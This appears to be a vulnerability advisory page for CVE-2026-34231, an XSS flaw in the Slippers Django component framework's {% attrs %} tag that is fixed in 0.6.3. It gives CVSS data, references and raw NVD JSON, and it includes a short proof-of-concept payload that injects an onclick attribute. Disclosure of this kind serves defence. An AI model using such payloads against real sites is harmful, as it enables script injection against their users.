CVE-2026-34231

Description

Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:django:slippers:*:*:*:*:*:*:*:* - VULNERABLE

Slippers < 0.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-34231
# In a Django view, set a context variable with malicious payload
# context = {'user_input': 'id="btn" onclick="alert(\'XSS\')"'}

# In the Django template using the vulnerable slippers tag:
# <button {% attrs user_input %}>Submit</button>

# The rendered HTML will look like this:
# <button id="btn" onclick="alert('XSS')">Submit</button>
#
# When a user clicks the button, the JavaScript alert will execute.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34231
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34231
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34231/
[4] VulDB https://vuldb.com/cve/CVE-2026-34231
[5] https://github.com/mixxorz/slippers/commit/16cc4ef4fa8ad2f7aee30798f16c3e7b653423b2
[6] https://github.com/mixxorz/slippers/releases/tag/0.6.3
[7] https://github.com/mixxorz/slippers/security/advisories/GHSA-w7rv-gfp4-j9j3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34231", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.603", "lastModified": "2026-04-03T14:51:03.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:django:slippers:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.6.2", "matchCriteriaId": "617012FB-61E8-4B1B-AECD-08D5488A558A"}]}]}], "references": [{"url": "https://github.com/mixxorz/slippers/commit/16cc4ef4fa8ad2f7aee30798f16c3e7b653423b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mixxorz/slippers/releases/tag/0.6.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mixxorz/slippers/security/advisories/GHSA-w7rv-gfp4-j9j3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}